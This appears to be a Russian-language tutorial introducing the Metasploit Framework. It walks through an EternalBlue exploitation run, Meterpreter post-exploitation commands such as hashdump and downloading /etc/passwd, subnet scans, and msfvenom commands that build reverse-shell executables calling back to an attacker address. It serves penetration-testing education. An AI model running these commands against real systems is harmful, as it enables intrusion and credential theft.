Metasploit Framework — это не просто набор эксплойтов. Это целая платформа для разработки и запуска кода атаки, управления сессиями, пост-эксплуатации и документирования. Первый раз открыв msfconsole, большинство людей теряются в потоке команд. Давайте разберём структуру.
Архитектура Metasploit
Framework состоит из модулей нескольких типов:
- Exploits — код, использующий конкретную уязвимость
- Payloads — код, выполняемый после успешной эксплуатации (шеллы, meterpreter)
- Auxiliaries — вспомогательные модули: сканеры, фаззеры, брутфорсеры
- Post — модули пост-эксплуатации для уже захваченных сессий
- Encoders — кодировщики пейлоадов для обхода AV
- Nops — NOP-слайды для выравнивания эксплойтов
Первый запуск: msfconsole
msfconsole
Основные команды навигации:
search ms17-010 # поиск модулей use exploit/windows/smb/ms17_010_eternalblue info # информация о модуле show options # обязательные и опциональные параметры show payloads # список совместимых пейлоадов
Типичный рабочий процесс
На примере EternalBlue (MS17-010):
use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.1.100 set LHOST 192.168.1.50 set LPORT 4444 set PAYLOAD windows/x64/meterpreter/reverse_tcp run
После успешной эксплуатации вы попадаете в Meterpreter — интерактивную сессию на целевой машине.
Meterpreter: основные команды
Meterpreter — продвинутый агент пост-эксплуатации, работающий полностью в памяти:
sysinfo # информация о системе getuid # текущий пользователь getsystem # попытка повышения привилегий hashdump # дамп NTLM-хэшей upload file.exe /tmp/ # загрузить файл download /etc/passwd . # скачать файл shell # получить OS shell background # свернуть сессию в фон
Управление сессиями
Когда сессий несколько — переключаться между ними:
sessions -l # список активных сессий sessions -i 1 # взаимодействовать с сессией №1 sessions -k 1 # завершить сессию
Auxiliary-модули для разведки
Metasploit богат не только эксплойтами. Auxiliary-модули позволяют проводить разведку без эксплуатации:
use auxiliary/scanner/portscan/tcp set RHOSTS 192.168.1.0/24 set PORTS 22,80,443,445,3389 runuse auxiliary/scanner/smb/smb_ms17_010 set RHOSTS 192.168.1.0/24 run
Msfvenom: генерация пейлоадов
Отдельный инструмент для создания шеллкода и исполняемых файлов:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o shell.exe
Для Linux:
msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f elf -o shell.elf
Практический совет
Metasploit — инструмент с огромной базой модулей, но большинство из них не нужны в повседневной работе. Изучите хорошо 10-15 наиболее актуальных эксплойтов и вспомогательных модулей, научитесь правильно настраивать Meterpreter и управлять сессиями — это даст 90% практической ценности фреймворка.
Пока нет комментариев. Будьте первым!